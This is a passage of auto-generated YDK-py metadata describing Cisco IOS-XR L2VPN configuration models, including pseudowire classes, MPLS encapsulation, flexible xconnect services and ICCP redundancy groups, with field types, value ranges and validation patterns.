_MetaInfoClassMember('path-mtu', REFERENCE_CLASS, 'PathMtu' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
[], [],
''' Path maximum transmission unit
''',
'path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_CLASS, 'SignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
[], [],
''' L2TPv3 signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('time-to-live', ATTRIBUTE, 'int' , None, None,
[('1', '255')], [],
''' Time to live
''',
'time_to_live',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service', REFERENCE_CLASS, 'TypeOfService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
[], [],
''' Type of service
''',
'type_of_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tpv3-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
False,
[
_MetaInfoClassMember('disable-backup', ATTRIBUTE, 'int' , None, None,
[('0', '180')], [],
''' Disable backup delay
''',
'disable_backup',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BackupDisableEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BackupDisableEnum',
[], [],
''' Delay or Never
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-disable-delay',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'MplsSequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
False,
[
_MetaInfoClassMember('redundancy-initial-delay', ATTRIBUTE, 'int' , None, None,
[('0', '120')], [],
''' Initial delay before activating the
redundant PW, in seconds
''',
'redundancy_initial_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy-one-way', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force one-way PW redundancy behavior in
Redundancy Group
''',
'redundancy_one_way',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
False,
[
_MetaInfoClassMember('fallback-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Fallback disable
''',
'fallback_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-tunnel-number', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Interface Tunnel number for preferred path
''',
'interface_tunnel_number',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'PreferredPathEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PreferredPathEnum',
[], [],
''' Preferred Path Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'preferred-path',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
False,
[
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance-code', REFERENCE_ENUM_CLASS, 'FlowLabelTlvCodeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelTlvCodeEnum',
[], [],
''' Enable Legacy Flow Label TLV code
''',
'flow_label_load_balance_code',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-label-load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable PW Label based Load Balancing
''',
'pw_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'load-balance-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
False,
[
_MetaInfoClassMember('control-word', REFERENCE_ENUM_CLASS, 'ControlWordEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ControlWordEnum',
[], [],
''' Enable control word
''',
'control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MPLS encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance-group', REFERENCE_CLASS, 'LoadBalanceGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
[], [],
''' Load Balancing
''',
'load_balance_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-redundancy', REFERENCE_CLASS, 'MplsRedundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
[], [],
''' Redundancy options for MPLS encapsulation
''',
'mpls_redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('preferred-path', REFERENCE_CLASS, 'PreferredPath' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
[], [],
''' Preferred path
''',
'preferred_path',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-switching-tlv', REFERENCE_ENUM_CLASS, 'PwSwitchingPointTlvEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PwSwitchingPointTlvEnum',
[], [],
                ''' Pseudowire Switching Point TLV
''',
'pw_switching_tlv',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_ENUM_CLASS, 'MplsSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSignalingProtocolEnum',
[], [],
''' MPLS signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-tag-rewrite', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Static Tag rewrite
''',
'static_tag_rewrite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vccv-type', REFERENCE_ENUM_CLASS, 'VccvVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'VccvVerificationEnum',
[], [],
''' VCCV verification type
''',
'vccv_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-disable-delay', REFERENCE_CLASS, 'BackupDisableDelay' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
[], [],
                ''' Backup Pseudowire class
''',
'backup_disable_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire class
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tpv3-encapsulation', REFERENCE_CLASS, 'L2Tpv3Encapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
[], [],
''' L2TPv3 encapsulation
''',
'l2tpv3_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable backup MAC withdraw
''',
'mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-encapsulation', REFERENCE_CLASS, 'MplsEncapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
[], [],
''' MPLS encapsulation
''',
'mpls_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-class',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses',
False,
[
_MetaInfoClassMember('pseudowire-class', REFERENCE_LIST, 'PseudowireClass' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass',
[], [],
''' Pseudowire class
''',
'pseudowire_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-classes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
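    # A minimal configuration sketch, assuming the generated classes in
    # ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg follow the usual YDK-py
    # conventions that this metadata mirrors (the class-name value is
    # illustrative, not taken from this table):
    #
    #   from ydk.types import Empty
    #   from ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg import L2Vpn
    #
    #   l2vpn = L2Vpn()
    #   pw_class = l2vpn.database.pseudowire_classes.PseudowireClass()
    #   pw_class.name = 'pw-class-1'                  # key leaf, length (0, 32)
    #   pw_class.mpls_encapsulation.enable = Empty()  # Empty-typed presence leaf
    #   l2vpn.database.pseudowire_classes.pseudowire_class.append(pw_class)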
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuit', REFERENCE_LIST, 'VlanUnawareFxcAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'vlan_unaware_fxc_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpn', REFERENCE_LIST, 'VlanUnawareFxcPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
[], [],
''' EVPN FXC Service Configuration
''',
'vlan_unaware_fxc_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 23)], [],
''' Name of the Flexible XConnect Service
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuits', REFERENCE_CLASS, 'VlanUnawareFxcAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'vlan_unaware_fxc_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpns', REFERENCE_CLASS, 'VlanUnawareFxcPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'vlan_unaware_fxc_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-service', REFERENCE_LIST, 'VlanUnawareFlexibleXconnectService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
[], [],
''' Flexible XConnect Service
''',
'vlan_unaware_flexible_xconnect_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-services',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-services', REFERENCE_CLASS, 'VlanUnawareFlexibleXconnectServices' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
[], [],
                ''' List of VLAN-Unaware Flexible XConnect
Services
''',
'vlan_unaware_flexible_xconnect_services',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flexible-xconnect-service-table',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
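    # Flexible XConnect (FXC) note: a VLAN-unaware service is keyed by a short
    # name (length 0..23 above) and stitches local attachment-circuit
    # interfaces to EVPN pseudowires identified by (eviid, acid) key pairs.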
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface name
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mac-flush-tcn', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable STP-TCN MAC flushing
''',
'mac_flush_tcn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('primary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
                ''' Primary VLAN range, in the form of 1-3,5,8-11
''',
'primary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('recovery-delay', ATTRIBUTE, 'int' , None, None,
[('30', '3600')], [],
''' Failure clear recovery delay
''',
'recovery_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
                ''' Secondary VLAN range, in the form of 1-3,5,8-11
''',
'secondary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
False,
[
_MetaInfoClassMember('iccp-interface', REFERENCE_LIST, 'IccpInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
[], [],
''' Interface name
''',
'iccp_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
False,
[
_MetaInfoClassMember('group-id', ATTRIBUTE, 'int' , None, None,
[('-2147483648', '2147483647')], [],
''' Group ID
''',
'group_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('iccp-interfaces', REFERENCE_CLASS, 'IccpInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
[], [],
''' List of interfaces
''',
'iccp_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multi-homing-node-id', ATTRIBUTE, 'int' , None, None,
[('0', '254')], [],
''' ICCP-based service multi-homing node ID
''',
'multi_homing_node_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups',
False,
[
